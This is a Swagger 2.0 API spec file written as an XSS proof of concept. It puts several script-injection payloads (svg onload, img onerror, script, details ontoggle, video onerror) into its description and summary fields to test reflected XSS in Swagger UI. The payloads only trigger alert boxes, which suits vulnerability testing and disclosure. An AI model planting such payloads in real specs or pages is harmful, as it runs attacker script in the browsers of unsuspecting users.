swagger: "2.0"
info:
  title: "XSS PoC 🚨"
  description: |
    <svg/onload=alert('XSS')>
    <img src=x onerror=alert('XSS')>
    <script>alert(1)</script>
    <details open ontoggle=alert(1)>
    <video><source onerror="alert('XSS')">

  version: "1.0.0"
host: example.com
basePath: /
schemes:
  - https
paths:
  /test:
    get:
      summary: "<svg onload=alert('XSS')>"
      description: "Testing reflected XSS via Swagger UI"
      responses:
        200:
          description: "Success"
